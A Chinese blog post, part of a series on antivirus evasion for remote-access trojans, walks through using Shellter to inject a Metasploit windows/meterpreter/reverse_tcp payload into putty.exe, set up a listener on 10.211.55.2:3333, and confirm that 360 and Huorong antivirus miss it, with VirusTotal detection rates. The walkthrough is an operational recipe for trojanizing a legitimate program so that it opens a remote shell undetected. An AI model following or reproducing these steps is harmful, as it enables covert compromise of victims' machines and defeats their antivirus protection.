远控免杀专题7 ---shellter免杀
0x01 免杀能力一览表
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
0x02 前言
Shellter和Venom、Veil是三大老牌免杀工具,Shellter是一个开源的免杀工具,利用动态Shellcode注入或者命令来实现免杀的效果。
0x03 安装shellter
1、kali中已经自带shellter,可在图形界面中直接执行shellter命令即可
2、ubuntu系统中apt安装
apt-get update
apt-get install shellter
3、手动下载windows版
官方下载站点 https://www.shellterproject.com/download/
下载后解压,无需安装,cmd下可直接使用
0x04 生成payload
我就直接用kali自带的shellter进行演示,需要提前准备一个pe文件作为被注入程序。我还是用之前选的putty.exe来进行测试。
之后程序会把putty.exe进行备份,因为生成的payload会自动覆盖原来的putty.exe。
还是选择windows/meterpreter/reverse_tcp作为payload
上面有个选项Enable Stealth Mode,是否启用隐身模式,启用后免杀效果会变差,建议不启用。
全程自动化生成,最终的生成文件会替换原来的putty.exe。
通过对比可发现程序稍微变大了
在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp进行监听
在测试机中执行生成的putty.exe,360和火绒均可免杀,我试的时候火绒不可免杀,可能我的火绒版本比较高
msf正常上线
0x05 小结
Shellter安装非常简单,使用也非常便捷,而且生成的payload免杀效果也都比较好,windows和linux下都可以使用,实在是居家旅行、**灭口必备良药。我是用的自动模式进行生产payload,你可以根据自己的需要进行手动配置,这样生成的payload免杀效果会更好。
因为Shellter生成的shellcode是动态的,所以被查杀的几率也有所不同,测试过几次自动化生成的payload,最好的秒杀效果是4/71,最差的15/70,整体来说也算不错了
0x06 参考
msf免杀及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html
远控免杀专题7 ---shellter免杀相关推荐
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(22)-SpookFlare免杀
转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...
- 远控免杀专题(19)-nps_payload免杀
免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterper ...
- 远控免杀专题(20)-GreatSCT免杀
转载:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...
- 远控免杀专题(24)-CACTUSTORCH免杀
转载:https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...
最新文章
- 用python操作mysql数据库(之“更新”操作)
- 免费开源!新学期必收藏的AI学习资源,从课件、工具到源码都齐了
- java 日期和字符串互转,根据当天整天时间 得到当天最后一秒的日期时间
- python导入txt文件并绘图-Python读取txt某几列绘图的方法
- 2014年全国计算机等级一级考试复习资料,2014年全国计算机等级一级考试复习资料..doc...
- Team Leader你会带团队吗?你懂合作吗?你好像都不会啊!(上)
- 什么是浏览器指纹识别?浏览器指纹识别如何预防
- IIS 崩溃的后的感受
- 你还在烦U盘记录该如何消除吗
- java 中wait notify简解
- 3ds max 2012 VRay 2.0-3ds max 从入门到精通-元旦场景材质设置
- 中文版的XP转换为英文版的XP和XP多国语言包
- 配置阿里云maven仓库地址
- 正则表达式re中的group含义
- vue基于file-saver处理二进制文件流,导出文件
- 容器高度或者宽度的获取方式
- 虾皮系统老出现服务器错误,Shopee卖家须知:虾皮系统什么状况会自动取消订单?...
- 企微整合,钉钉进化,飞书抢占toB下半场
- IRF5850TRPBF数据手册 功率 MOSFET
- 浅谈计算机实用教学工具应用的体会,浅谈计算机常用工具软件教学心得.doc
热门文章
- commonJS — DOM操作(for DOM)
- Day2 HTML基本标签元素
- vsCode 设置vue 保存自动格式化代码
- WePY:在质疑中前进 | 文末福利
- 正则表达式强化,爬虫练习
- Java基础知识学习04-自定义类、ArrayList集合
- JAVA 常用框架和工具
- 2014年9月21日_随笔,jdic,ETL,groovy,Nutz好多东西想学
- -bash: belts.awk: command not found
- asp.net mvc 2 DisplayTemplates 的使用